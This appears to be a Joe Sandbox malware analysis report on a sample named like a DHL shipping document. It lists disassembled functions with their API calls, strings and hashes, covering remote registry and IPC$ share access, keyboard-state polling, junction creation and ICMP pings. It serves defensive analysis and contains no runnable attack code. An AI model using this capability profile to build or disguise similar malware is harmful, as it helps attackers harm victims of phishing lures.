Instruction Fuzzy Hash: 2B318075911129BBD7248FA1EC8CEFFBB7CEF05750F200165A905E3240DA749E45ABA0

Function 00213D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00213D40
_wcslen.LIBCMT ref: 00213D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00213D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00213DBE
RemoveDirectoryW.KERNEL32(?), ref: 00213DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00213E55
CloseHandle.KERNEL32(00000000), ref: 00213E60
CloseHandle.KERNEL32(00000000), ref: 00213E6B

Strings

\??\%s, xrefs: 00213D5B
\, xrefs: 00213D77
:, xrefs: 00213D82

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 46178155362ec1b5fb65c8da36e8b1bb6094c0e1ce996025a425cf1d57424fef
Instruction ID: d78d826f578f38b1ce30ea3f14280d93d4ab33caf22dacad25de8f37caf96fea
Opcode Fuzzy Hash: 46178155362ec1b5fb65c8da36e8b1bb6094c0e1ce996025a425cf1d57424fef
Instruction Fuzzy Hash: 8431927291020AABDB20DFA0EC49FEF37BDEF99700F1040A5F505E6090E77497948B64

Function 0020E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0020E6B4

Part of subcall function 001BE551: timeGetTime.WINMM(?,?,0020E6D4), ref: 001BE555

Sleep.KERNEL32(0000000A), ref: 0020E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0020E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0020E727
SetActiveWindow.USER32 ref: 0020E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0020E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0020E773
Sleep.KERNEL32(000000FA), ref: 0020E77E
IsWindow.USER32 ref: 0020E78A
EndDialog.USER32(00000000), ref: 0020E79B

Strings

BUTTON, xrefs: 0020E719

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: b42710ac632ef168a3deadfceb8de18ec262172130e7366ea5c1f1a7e92f736e
Instruction ID: ebaf77e1e0fe9f8ac1b397678fae5e7d761211f029ae4611e31e068dd42b8868
Opcode Fuzzy Hash: b42710ac632ef168a3deadfceb8de18ec262172130e7366ea5c1f1a7e92f736e
Instruction Fuzzy Hash: EA21A1B0210301EFEF006F20FC8DA257B6DFB94348F250825F90AA11F2DB71ACA49B24

Function 0020E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0020EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0020EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0020EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0020EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0020EAA7

Strings

close PlayMe, xrefs: 0020EA6E, 0020EA9B
alias PlayMe, xrefs: 0020EA36
play PlayMe, xrefs: 0020EAA2
status PlayMe mode, xrefs: 0020EA58
play PlayMe wait, xrefs: 0020EA91
open , xrefs: 0020EA0C

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 90033ae8293a45de2ff94796fdf3ee7dac443b2e10380529599fca248adac8fe
Instruction ID: e73da22dd73c6e229dc29e1d98fb99fb53072bbb9d988797691a6acbf600bdba
Opcode Fuzzy Hash: 90033ae8293a45de2ff94796fdf3ee7dac443b2e10380529599fca248adac8fe
Instruction Fuzzy Hash: DB117735A6125979DB10A762DC4EEFF6A7CEFD7B40F4408297811A20D1DFB00995C5B0

Function 00205CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00205CE2
GetWindowRect.USER32(00000000,?), ref: 00205CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00205D59
GetDlgItem.USER32(?,00000002), ref: 00205D69
GetWindowRect.USER32(00000000,?), ref: 00205D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00205DCF
GetDlgItem.USER32(?,000003E9), ref: 00205DDD
GetWindowRect.USER32(00000000,?), ref: 00205DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00205E31
GetDlgItem.USER32(?,000003EA), ref: 00205E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00205E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00205E67

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 21518b529318768f273c1e3249b1c8ca8794364c96742332daf93abe2064de48
Instruction ID: 4747233ffd2bcd64c51ab538e022346cb533f1dfa69d1a619dcd12a6903f53e0
Opcode Fuzzy Hash: 21518b529318768f273c1e3249b1c8ca8794364c96742332daf93abe2064de48
Instruction Fuzzy Hash: B1512EB0A10715AFDF18CF68DD89AAEBBB9FB48310F208129F915E6291D7709E10CF50

Function 001B8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 001B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001B8BE8,?,00000000,?,?,?,?,001B8BBA,00000000,?), ref: 001B8FC5

DestroyWindow.USER32(?), ref: 001B8C81
KillTimer.USER32(00000000,?,?,?,?,001B8BBA,00000000,?), ref: 001B8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 001F6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,001B8BBA,00000000,?), ref: 001F69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,001B8BBA,00000000,?), ref: 001F69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001B8BBA,00000000), ref: 001F69D4
DeleteObject.GDI32(00000000), ref: 001F69E6

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: e1b7f6616502b2bf11dd31fc3f962835e5d637056c36a82bc8eb81a5ddd415ef
Instruction ID: 9b68fb5e67e3f2929e2e7969b7dbc126ee73720458baaac7be5bc44a2df12062
Opcode Fuzzy Hash: e1b7f6616502b2bf11dd31fc3f962835e5d637056c36a82bc8eb81a5ddd415ef
Instruction Fuzzy Hash: E061B971102605DFCB299F28E948BA5BBF5FF40716F244518E246AB960CB71A8A1DFA0

Function 001B9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 001B9944: GetWindowLongW.USER32(?,000000EB), ref: 001B9952

GetSysColor.USER32(0000000F), ref: 001B9862

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: a2cc7f5a2d4b2dafae3bc5f274570b0b8d56126bc282513e14675436440e7670
Instruction ID: 010c234e673c26b5c4894d763b821ecd63224ab33ac0fc0253c3b5db3d90c773
Opcode Fuzzy Hash: a2cc7f5a2d4b2dafae3bc5f274570b0b8d56126bc282513e14675436440e7670
Instruction Fuzzy Hash: 15418E31104648AFDB215F38AC88BF93BB5AB06331F244659FBA69B2E1D7319C43DB10

Function 002096E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,001EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00209717
LoadStringW.USER32(00000000,?,001EF7F8,00000001), ref: 00209720

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,001EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00209742
LoadStringW.USER32(00000000,?,001EF7F8,00000001), ref: 00209745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00209866

Strings

Error: , xrefs: 0020981D
Line %d:, xrefs: 002097A0
^ ERROR, xrefs: 002097FB
Line %d (File "%s"):, xrefs: 0020978F
%s (%d) : ==> %s: %s %s, xrefs: 0020984A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: f98dd28bb6b2c1cb2948d324f002d11e723385ef72cdb81b7adcdfef17b09076
Instruction ID: 53550bbf7f63a0b43b64bb47f8069067723d3a60f45fa852e65fbf94518d63b5
Opcode Fuzzy Hash: f98dd28bb6b2c1cb2948d324f002d11e723385ef72cdb81b7adcdfef17b09076
Instruction Fuzzy Hash: E5415172800219AACF05EBE1DD46EEEB778EF66340F504065F50672092EF356F99CB61

Function 002006DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 001A6B57: _wcslen.LIBCMT ref: 001A6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002007A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002007BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002007DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00200804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0020082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00200837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0020083C

Strings

SOFTWARE\Classes\, xrefs: 0020070E
\CLSID, xrefs: 00200724
\IPC$, xrefs: 00200784

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 853a44564232bcb4a27f7c67cb33e78e1b0c1f505a878e7240680f6ff263172a
Instruction ID: 66f1eb9bc7e23b6d211b6e1d107033aca3d8fdefbbedfc9853ed125033ee17b9
Opcode Fuzzy Hash: 853a44564232bcb4a27f7c67cb33e78e1b0c1f505a878e7240680f6ff263172a
Instruction Fuzzy Hash: 39411476C20229ABDF15EFA4DC85DEEB778BF14350F544129E901B31A1EB349E54CBA0

Function 00223C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00223C5C
CoInitialize.OLE32(00000000), ref: 00223C8A
CoUninitialize.OLE32 ref: 00223C94
_wcslen.LIBCMT ref: 00223D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00223DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00223ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00223F0E
CoGetObject.OLE32(?,00000000,0023FB98,?), ref: 00223F2D
SetErrorMode.KERNEL32(00000000), ref: 00223F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00223FC4
VariantClear.OLEAUT32(?), ref: 00223FD8

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 23c9f33afd2ec78ea0f252f5e761256aacae61ac5562ec069c291b67bfd48527
Instruction ID: 8e1992bbf71559c2554b525c88dbd0c94e3f3dedde40738530fb035e37d3f774
Opcode Fuzzy Hash: 23c9f33afd2ec78ea0f252f5e761256aacae61ac5562ec069c291b67bfd48527
Instruction Fuzzy Hash: B0C17671618311AFD700DFA8E88492BB7E9FF89748F10491DF98A9B251DB34EE05CB52

Function 00217A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00217AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00217B8F
SHGetDesktopFolder.SHELL32(?), ref: 00217BA3
CoCreateInstance.OLE32(0023FD08,00000000,00000001,00266E6C,?), ref: 00217BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00217C74
CoTaskMemFree.OLE32(?,?), ref: 00217CCC
SHBrowseForFolderW.SHELL32(?), ref: 00217D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00217D7A
CoTaskMemFree.OLE32(00000000), ref: 00217D81
CoTaskMemFree.OLE32(00000000), ref: 00217DD6
CoUninitialize.OLE32 ref: 00217DDC

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 92863247a11fe24e14495a0e10f62dd7e7f2e59a516bd62d7a152d7d7825e6d1
Instruction ID: 39a5684903a05a71ec41c29e5f9f2145a492bbada19d950458651c4d4b83824d
Opcode Fuzzy Hash: 92863247a11fe24e14495a0e10f62dd7e7f2e59a516bd62d7a152d7d7825e6d1
Instruction Fuzzy Hash: F2C13C75A04109AFCB14DF64D888DAEBBF9FF59304B148499F916EB261D730EE81CB90

Function 0023541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00235504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00235515
CharNextW.USER32(00000158), ref: 00235544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00235585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0023559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002355AC

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 07d2e2724096d216253be37fa180b3580c39a5e30b90af33345dc8db4d64fdb2
Instruction ID: 67325e325ffca5af01a36070438242899c45b10c17f8bc3cc80cd473ed3a2f46
Opcode Fuzzy Hash: 07d2e2724096d216253be37fa180b3580c39a5e30b90af33345dc8db4d64fdb2
Instruction Fuzzy Hash: DA61B0B0920629EBDF14CF54DC85AFE7BB9FF09320F504045F629A6290D7749AA1DFA0

Function 001FFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001FFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 001FFB08
VariantInit.OLEAUT32(?), ref: 001FFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 001FFB3A
VariantCopy.OLEAUT32(?,?), ref: 001FFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 001FFBA1
VariantClear.OLEAUT32(?), ref: 001FFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 001FFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001FFBCC
VariantClear.OLEAUT32(?), ref: 001FFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001FFBE9

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: cfcd382d8196abcbdc2caa6a230c7cc6dc1938de2c588502792bac86444cde24
Instruction ID: 0098a9bf6e0a2de340bec2d6c2849a13b09df482de9f0a0085649d823a06e800
Opcode Fuzzy Hash: cfcd382d8196abcbdc2caa6a230c7cc6dc1938de2c588502792bac86444cde24
Instruction Fuzzy Hash: 6D414035A0021D9FCB04DF68D8589FEBBB9FF58354F108069EA56A7261CB70E946CF90

Function 00209C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00209CA1
GetAsyncKeyState.USER32(000000A0), ref: 00209D22
GetKeyState.USER32(000000A0), ref: 00209D3D
GetAsyncKeyState.USER32(000000A1), ref: 00209D57
GetKeyState.USER32(000000A1), ref: 00209D6C
GetAsyncKeyState.USER32(00000011), ref: 00209D84
GetKeyState.USER32(00000011), ref: 00209D96
GetAsyncKeyState.USER32(00000012), ref: 00209DAE
GetKeyState.USER32(00000012), ref: 00209DC0
GetAsyncKeyState.USER32(0000005B), ref: 00209DD8
GetKeyState.USER32(0000005B), ref: 00209DEA

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 26e515ab461bbc536b250d807b520f940385e1d2c1631a074cdbdc22ae29ced8
Instruction ID: ea322b34136f1474b4cc4482330bc70e04947cdd73931c6399686b7da2afbb96
Opcode Fuzzy Hash: 26e515ab461bbc536b250d807b520f940385e1d2c1631a074cdbdc22ae29ced8
Instruction Fuzzy Hash: 0D41E6309647CB69FF309F64C8043B5BEA0AB15304F44805ACAC7565C3DBA49DE8C792

Function 0022055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002205BC
inet_addr.WSOCK32(?), ref: 0022061C
gethostbyname.WSOCK32(?), ref: 00220628
IcmpCreateFile.IPHLPAPI ref: 00220636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002206C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002206E5
IcmpCloseHandle.IPHLPAPI(?), ref: 002207B9
WSACleanup.WSOCK32 ref: 002207BF

Strings

Ping, xrefs: 00220676

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 73a7ef6664caab22924014aeef8c55f04594e3135b1e237e31896e41459918cb
Instruction ID: aeb6b11bc61351ce7946f29bbf02b0eed60c28739954aa8b5ddadf2db0b8f046
Opcode Fuzzy Hash: 73a7ef6664caab22924014aeef8c55f04594e3135b1e237e31896e41459918cb
Instruction Fuzzy Hash: A191AD35618212AFD320CF55E8C8F1ABBE4AF48318F1485A9F4699B6A3C770ED51CF81

Function 00228CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00228CF3

Part of subcall function 00208E54: _wcslen.LIBCMT ref: 00208E77

_wcslen.LIBCMT ref: 00228D4E
_wcslen.LIBCMT ref: 00228D9C
_wcslen.LIBCMT ref: 00228DDC
_wcslen.LIBCMT ref: 00228E6E

Strings

winapi, xrefs: 00228D96, 00228D9B
